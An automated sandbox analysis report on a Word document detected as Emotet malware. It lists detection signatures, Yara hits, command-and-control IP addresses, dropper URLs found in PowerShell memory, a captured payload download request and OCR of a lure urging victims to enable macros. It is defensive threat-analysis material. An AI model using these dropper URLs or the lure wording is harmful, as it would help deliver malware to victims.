Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name: ARCH_25_012021.doc
Analysis ID: 344718
MD5: baedc37e68b58765fa52c73d0fd2c2d5
SHA1: 2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256: 94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://3musketeersent.net/wp-includes/TUgD/ Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/ Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/ Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://3musketeersent.net/wp-includes/TUgD/ Virustotal: Detection: 8%
Source: https://skilmu.com/wp-admin/hQVlB8b/ Virustotal: Detection: 10%
Source: http://jeevanlic.com/wp-content/r8M/ Virustotal: Detection: 14%
Source: http://dashudance.com/thinkphp/dgs7Jm9/ Virustotal: Detection: 14%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll ReversingLabs: Detection: 54%
Multi AV Scanner detection for submitted file
Source: ARCH_25_012021.doc Virustotal: Detection: 16%
Source: ARCH_25_012021.doc ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 12.2.rundll32.exe.240000.0.unpack Avira: Label: TR/ATRAPS.Gen
Source: 8.2.rundll32.exe.740000.1.unpack Avira: Label: TR/ATRAPS.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028CC2A CryptDecodeObjectEx

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: shannared.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.169.223.13:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49166 -> 84.232.229.24:80
Source: Traffic Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49167 -> 51.255.203.164:8080
Source: Traffic Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49169 -> 217.160.169.110:8080
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49171 -> 185.183.16.47:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 51.255.203.164:8080
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 217.160.169.110:8080
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Jan 2021 23:10:16 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 6010a158c3613=1611702616; expires=Tue, 26-Jan-2021 23:11:16 GMT; Max-Age=60; path=/Last-Modified: Tue, 26 Jan 2021 23:10:16 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Tue, 26 Jan 2021 23:10:16 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requests Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 84.232.229.24
Source: Joe Sandbox View IP Address: 192.169.223.13
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: OVHFR
Source: Joe Sandbox View ASN Name: RCS-RDS73-75DrStaicoviciRO
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5248432-B174-499E-B3BD-E7523F18DF93}.tmp
Source: global traffic HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: shannared.com
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2095818604.0000000003CE6000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2089932064.0000000002360000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096763886.0000000002910000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2096042413.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092922246.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095174145.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096496954.0000000001F57000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2100155586.00000000021D7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2095364139.0000000003BDA000.00000004.00000001.sdmp String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2095209420.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2097508616.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2094474454.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2098090844.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2095854537.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2099872528.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2098968815.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2092243778.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.660000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , word
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , words: 8,758 , C i N@m 13
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT buttons to preview this document. a
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT buttons to preview this
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT buttons to preview this document. a
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Very long command line found
Source: unknown Process created: Commandline size = 5677
Source: unknown Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5576
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Kizmwn\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B60B9 10_2_003B60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A16B2 10_2_003A16B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003AC0B6 10_2_003AC0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BB499 10_2_003BB499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BD099 10_2_003BD099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A3E9E 10_2_003A3E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B4689 10_2_003B4689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B188F 10_2_003B188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003AC485 10_2_003AC485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B72F1 10_2_003B72F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B32F0 10_2_003B32F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BD2EC 10_2_003BD2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B04E1 10_2_003B04E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B10E5 10_2_003B10E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B6AE4 10_2_003B6AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B1ED9 10_2_003B1ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B84D9 10_2_003B84D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B5CDF 10_2_003B5CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B5AC3 10_2_003B5AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A32C2 10_2_003A32C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B893D 10_2_003B893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A6134 10_2_003A6134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B6D34 10_2_003B6D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B6934 10_2_003B6934
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BE32D 10_2_003BE32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B8F18 10_2_003B8F18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B531E 10_2_003B531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BD713 10_2_003BD713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A6B79 10_2_003A6B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A577E 10_2_003A577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BA972 10_2_003BA972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B7F6A 10_2_003B7F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A2362 10_2_003A2362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A4152 10_2_003A4152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A5155 10_2_003A5155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BC340 10_2_003BC340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BA746 10_2_003BA746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B43BF 10_2_003B43BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A65BF 10_2_003A65BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A85B3 10_2_003A85B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A73A8 10_2_003A73A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A9DAE 10_2_003A9DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A9DAD 10_2_003A9DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003AD1A3 10_2_003AD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B7DA5 10_2_003B7DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BB998 10_2_003BB998
